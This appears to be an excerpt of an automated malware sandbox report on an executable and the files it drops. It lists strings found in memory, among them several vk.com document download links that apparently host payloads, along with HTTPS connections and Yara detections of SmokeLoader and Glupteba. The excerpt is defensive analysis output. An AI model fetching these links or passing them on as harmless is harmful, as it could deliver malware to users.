Source: i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B70000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1724487309.0000029625A52000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1742129670.0000029625A52000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625A58000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744586501.0000029625A58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/
Source: i1crvbOZAP.exe, 00000000.00000003.1744586501.0000029625AA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/browser_reports?dest=default_reports
Source: i1crvbOZAP.exe, 00000000.00000003.1730559718.0000029625BBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/doc329118071_675792624?hash=XfyAKbRGjhzAxkfmvlCrdz9zJtdyzNRcHwmff3vnq80&dl=Ze3IH3BxY7
Source: i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C64000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625A9E000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1724487309.0000029625A9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/doc329118071_676158749?hash=wJqTXfnxe0acmwC4vumRgawHgxCuE6EviXjICmkirIT&dl=YVEMDGiurK
Source: i1crvbOZAP.exe, 00000000.00000003.1685738972.00000296259FD000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C64000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/doc329118071_676251329?hash=gdEXjFzqP4Hz4RjHrC6Ryb5BsQH3gXEoTcWHcSEbfh0&dl=n9WfEp2Oq3
Source: i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/doc329118071_676351514?hash=oPyw4gmGJJun6lU9sLErlqtdzmddNG56Nt55YfEENPc&dl=RCDwPdBUKr
Source: i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C64000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/doc329118071_676351627?hash=Prtaj0ZgUNfFsiq7F7Grkvgpr1vjXL0n0VmegSdJgKX&dl=o8jO07ZxaF
Source: i1crvbOZAP.exe, 00000000.00000003.1685738972.00000296259FD000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B93000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C64000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/doc329118071_676372534?hash=mU6chkoRzazMAQommLzbARbrOtVcQjV2nCZO5HLxzXD&dl=F4ujiRXkvZ
Source: i1crvbOZAP.exe, 00000000.00000003.1685738972.00000296259FD000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1920255803.0000029625AC4000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C8F000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.0000029625AB6000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1959313300.0000029623C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc329118071_675792624?hash=XfyAKbRGjhzAxkfmvlCrdz9zJtdyzNRcHwmff3vnq80&dl=Ze3IH3B
Source: i1crvbOZAP.exe, 00000000.00000003.1685738972.00000296259FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc329118071_676158749?hash=wJqTXfnxe0acmwC4vumRgawHgxCuE6EviXjICmkirIT&dl=YVEMDGi
Source: i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623CF3000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.00000296259FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc329118071_676251329?hash=gdEXjFzqP4Hz4RjHrC6Ryb5BsQH3gXEoTcWHcSEbfh0&dl=n9WfEp2
Source: i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc329118071_676351514?hash=oPyw4gmGJJun6lU9sLErlqtdzmddNG56Nt55YfEENPc&dl=RCDwPdB
Source: i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc329118071_676351627?hash=Prtaj0ZgUNfFsiq7F7Grkvgpr1vjXL0n0VmegSdJgKX&dl=o8jO07Z
Source: i1crvbOZAP.exe, 00000000.00000003.1685738972.00000296259FD000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc329118071_676372534?hash=mU6chkoRzazMAQommLzbARbrOtVcQjV2nCZO5HLxzXD&dl=F4ujiRX
Source: i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.ru
Source: Y8KGRj_sUjw5KjZpIoRDoSwV.exe, 0000000B.00000003.1856929531.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Y8KGRj_sUjw5KjZpIoRDoSwV.exe, 0000000B.00000002.2876490424.0000000001F50000.00000004.00001000.00020000.00000000.sdmp, Y8KGRj_sUjw5KjZpIoRDoSwV.exe, 0000000B.00000003.1857005290.0000000001F44000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://vovsoft.com/contact/
Source: Y8KGRj_sUjw5KjZpIoRDoSwV.exe, 0000000B.00000003.1856929531.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Y8KGRj_sUjw5KjZpIoRDoSwV.exe, 0000000B.00000002.2876490424.0000000001F50000.00000004.00001000.00020000.00000000.sdmp, Y8KGRj_sUjw5KjZpIoRDoSwV.exe, 0000000B.00000003.1857005290.0000000001F44000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://vovsoft.com/contact/.
Source: Y8KGRj_sUjw5KjZpIoRDoSwV.exe, 0000000B.00000003.1856929531.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Y8KGRj_sUjw5KjZpIoRDoSwV.exe, 0000000B.00000002.2876490424.0000000001F50000.00000004.00001000.00020000.00000000.sdmp, Y8KGRj_sUjw5KjZpIoRDoSwV.exe, 0000000B.00000003.1857005290.0000000001F44000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://vovsoft.com/newsletter/
Source: i1crvbOZAP.exe, 00000000.00000003.1700891751.0000029625BD6000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1725574620.0000029625BCE000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1696637430.0000029625BD6000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1684844522.0000029625BF2000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1688482716.0000029625BCF000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1754597520.0000029625BCE000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1704990254.0000029625BD5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685003043.0000029625BC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: i1crvbOZAP.exe, 00000000.00000002.1961249702.0000029625A1E000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.00000296259FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-websiteW
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000003.2021400787.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: i1crvbOZAP.exe, 00000000.00000003.1808069517.00000296262CB000.00000004.00000020.00020000.00000000.sdmp, g1nHVnlr2tXTEWQsRz_M547D.exe, 00000009.00000000.1841386447.0000000000F52000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://www.google.com/accounts/o8/.well-known/host-meta?hd=
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000003.2021400787.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C76000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AB0000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C76000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AB0000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.instagram.com
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://www.mozilla.org/about/exe
Source: I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000003.2358233461.0000000001E6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000003.2358233461.0000000001E6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000003.2122835000.000000002751F000.00000004.00000020.00020000.00000000.sdmp, I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000003.2356748597.0000000001E6D000.00000004.00000020.00020000.00000000.sdmp, I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000003.2346103006.0000000001E6D000.00000004.00000020.00020000.00000000.sdmp, I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000003.2342351463.0000000001E6D000.00000004.00000020.00020000.00000000.sdmp, I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000003.2363041539.0000000001E6D000.00000004.00000020.00020000.00000000.sdmp, I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000003.2351039967.0000000001E6D000.00000004.00000020.00020000.00000000.sdmp, I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000003.2354249256.0000000001E6D000.00000004.00000020.00020000.00000000.sdmp, I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000003.2358233461.0000000001E6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000003.2358233461.0000000001E6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000003.2122835000.000000002751F000.00000004.00000020.00020000.00000000.sdmp, I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000003.2356748597.0000000001E6D000.00000004.00000020.00020000.00000000.sdmp, I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000003.2346103006.0000000001E6D000.00000004.00000020.00020000.00000000.sdmp, I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000003.2342351463.0000000001E6D000.00000004.00000020.00020000.00000000.sdmp, I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000003.2363041539.0000000001E6D000.00000004.00000020.00020000.00000000.sdmp, I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000003.2351039967.0000000001E6D000.00000004.00000020.00020000.00000000.sdmp, I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000003.2354249256.0000000001E6D000.00000004.00000020.00020000.00000000.sdmp, I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000003.2358233461.0000000001E6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C76000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AB0000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yastatic.net

Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 443

Source: unknown	HTTPS traffic detected: 104.26.9.59:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.248:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.119:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.53:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.205.93.0:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.218.160:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.182:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.216.219.33:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.130.41.108:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.164.45.22:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 93.186.225.194:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 93.186.225.194:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.142.206.0:443 -> 192.168.2.4:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.142.206.1:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.142.206.2:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.240.190.89:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.63.150:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.113:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.63.150:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.63.150:443 -> 192.168.2.4:49808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.47.27.74:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.46.229.36:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.46.229.36:443 -> 192.168.2.4:49843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.46.229.36:443 -> 192.168.2.4:49846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.19.138.79:443 -> 192.168.2.4:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49855 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49885 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.104.85.160:443 -> 192.168.2.4:49886 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.46.229.36:443 -> 192.168.2.4:49888 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49893 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49896 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000012.00000002.2162296306.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2169331111.0000000002A31000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2876108133.00000000011D1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

E-Banking Fraud

Yara detected Glupteba

Source: Yara match	File source: 13.2.RMz4w55AcOQKH9K459dvrUGA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.KUc3lCE6xAEEreIlM0ct4583.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RMz4w55AcOQKH9K459dvrUGA.exe.2f70e67.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2170856076.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
